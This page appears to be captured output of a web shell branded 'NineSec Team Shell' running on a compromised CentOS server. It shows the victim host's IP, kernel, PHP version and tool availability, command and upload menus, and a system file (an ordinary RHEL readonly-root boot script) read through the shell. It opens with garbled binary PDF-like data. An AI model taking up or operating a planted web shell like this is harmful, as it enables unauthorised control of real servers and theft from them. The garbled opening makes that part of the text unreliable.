%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.69.58.250
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0755) :  /proc/16354/root/lib/systemd/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //proc/16354/root/lib/systemd/rhel-readonly
#!/bin/bash
#
# Set up readonly-root support.
#

. /etc/init.d/functions

# We need to initialize the $HOSTNAME variable by ourselves now:
# (It was previously done for RHEL-6 branch, but got lost in time.)
HOSTNAME="$(hostname)"

# Check SELinux status
SELINUX_STATE=
if [ -e "/sys/fs/selinux/enforce" ] && [ "$(cat /proc/self/attr/current)" != "kernel" ]; then
	if [ -r "/sys/fs/selinux/enforce" ] ; then
		SELINUX_STATE=$(cat "/sys/fs/selinux/enforce")
	else
		# assume enforcing if you can't read it
		SELINUX_STATE=1
	fi
fi

selinux_fixup() {
	if [ -n "$SELINUX_STATE" ] && [ -e "$1" ]; then
		restorecon -R "$1"
	fi
}

# Only read this once.
[ -z "${cmdline}" ] && cmdline=$(cat /proc/cmdline)

READONLY=
if [ -f /etc/sysconfig/readonly-root ]; then
	. /etc/sysconfig/readonly-root
fi
if strstr "$cmdline" readonlyroot ; then
	READONLY=yes
	[ -z "$RW_MOUNT" ] && RW_MOUNT=/var/lib/stateless/writable
	[ -z "$STATE_MOUNT" ] && STATE_MOUNT=/var/lib/stateless/state
fi
if strstr "$cmdline" noreadonlyroot ; then
	READONLY=no
fi

MOUNTS=()
if [ "$READONLY" = "yes" -o "$TEMPORARY_STATE" = "yes" ]; then

        add_mount() {
                mnt=${1%/}
                MOUNTS=("${MOUNTS[@]}" "$mnt")
        }

        cp_empty() {
                if [ -e "$1" ]; then
			echo "$1" | cpio -p -vd "$RW_MOUNT" &>/dev/null
                        add_mount $1
		fi
        }

        cp_dirs() {
		if [ -e "$1" ]; then
			mkdir -p "$RW_MOUNT$1"
			find "$1" -type d -print0 | cpio -p -0vd "$RW_MOUNT" &>/dev/null
                        add_mount $1
		fi
	}

        cp_files() {
		if [ -e "$1" ]; then
			cp -a --parents "$1" "$RW_MOUNT"
                        add_mount $1
		fi
	}

	# Common mount options for scratch space regardless of
	# type of backing store
	mountopts=

	# Scan partitions for local scratch storage
	rw_mount_dev=$(blkid -t LABEL="$RW_LABEL" -l -o device)

        bindmountopts=
        [ "$SLAVE_MOUNTS" = "yes" ] && bindmountopts="--make-slave"

	# First try to mount scratch storage from /etc/fstab, then any
	# partition with the proper label.  If either succeeds, be sure
	# to wipe the scratch storage clean.  If both fail, then mount
	# scratch storage via tmpfs.
	if mount $mountopts "$RW_MOUNT" > /dev/null 2>&1 ; then
		rm -rf "$RW_MOUNT" > /dev/null 2>&1
	elif [ x$rw_mount_dev != x ] && mount $rw_mount_dev $mountopts "$RW_MOUNT" > /dev/null 2>&1; then
		rm -rf "$RW_MOUNT"  > /dev/null 2>&1
	else
		mount -n -t tmpfs $RW_OPTIONS $mountopts none "$RW_MOUNT"
	fi

	for file in /etc/rwtab /etc/rwtab.d/* /run/initramfs/rwtab ; do
		is_ignored_file "$file" && continue
	[ -f $file ] && while read type path ; do
			case "$type" in
				empty)
					cp_empty $path
					;;
				files)
					cp_files $path
					;;
				dirs)
					cp_dirs $path
					;;
				*)
					;;
			esac
                done < <(cat $file)
	done

        for m in "${MOUNTS[@]}"; do
                prefix=0
                for mount_point in "${MOUNTS[@]}"; do
                        [[ $m = $mount_point ]] && continue
                        if [[ $m =~ ^$mount_point/.* ]] ; then
                                prefix=1
                                break
                        fi
                done
                [[ $prefix -eq 1 ]] && continue

                mount -n --bind $bindmountopts "$RW_MOUNT$m" "$m"
	        selinux_fixup "$m"
        done

	# Use any state passed by initramfs
	[ -d /run/initramfs/state ] && cp -a /run/initramfs/state/* $RW_MOUNT

	# In theory there should be no more than one network interface active
	# this early in the boot process -- the one we're booting from.
	# Use the network address to set the hostname of the client.  This
	# must be done even if we have local storage.
	ipaddr=
	if [ "$HOSTNAME" = "localhost" -o "$HOSTNAME" = "localhost.localdomain" ]; then
		ipaddr=$(ip addr show to 0.0.0.0/0 scope global | awk '/[[:space:]]inet / { print gensub("/.*","","g",$2) }')
		for ip in $ipaddr ; do
			HOSTNAME=
			eval $(ipcalc -h $ipaddr 2>/dev/null)
			[ -n "$HOSTNAME" ] && { hostname ${HOSTNAME} ; break; }
		done
	fi
	
	# Clients with read-only root filesystems may be provided with a
	# place where they can place minimal amounts of persistent
	# state.  SSH keys or puppet certificates for example.
	#
	# Ideally we'll use puppet to manage the state directory and to
	# create the bind mounts.  However, until that's all ready this
	# is sufficient to build a working system.

	# First try to mount persistent data from /etc/fstab, then any
	# partition with the proper label, then fallback to NFS
	state_mount_dev=$(blkid -t LABEL="$STATE_LABEL" -l -o device)
	if mount $mountopts $STATE_OPTIONS "$STATE_MOUNT" > /dev/null 2>&1 ; then
		/bin/true
	elif [ x$state_mount_dev != x ] && mount $state_mount_dev $mountopts "$STATE_MOUNT" > /dev/null 2>&1;  then
		/bin/true
	elif [ ! -z "$CLIENTSTATE" ]; then
		# No local storage was found.  Make a final attempt to find
		# state on an NFS server.

		mount -t nfs $CLIENTSTATE/$HOSTNAME $STATE_MOUNT -o rw,nolock
	fi

	if [ -w "$STATE_MOUNT" ]; then

		mount_state() {
			if [ -e "$1" ]; then
				[ ! -e "$STATE_MOUNT$1" ] && cp -a --parents "$1" "$STATE_MOUNT"
				mount -n --bind $bindmountopts "$STATE_MOUNT$1" "$1"
			fi
		}

		for file in /etc/statetab /etc/statetab.d/* ; do
			is_ignored_file "$file" && continue
			[ ! -f "$file" ] && continue

			if [ -f "$STATE_MOUNT/$file" ] ; then
				mount -n --bind $bindmountopts "$STATE_MOUNT/$file" "$file"
			fi

			for path in $(grep -v "^#" "$file" 2>/dev/null); do
				mount_state "$path"
				selinux_fixup "$path"
			done
		done

		if [ -f "$STATE_MOUNT/files" ] ; then
			for path in $(grep -v "^#" "$STATE_MOUNT/files" 2>/dev/null); do
				mount_state "$path"
				selinux_fixup "$path"
			done
		fi
	fi

        if mount | grep -q /var/lib/nfs/rpc_pipefs ; then
                mount -t rpc_pipefs sunrpc /var/lib/nfs/rpc_pipefs
        fi
fi

NineSec Team - 2022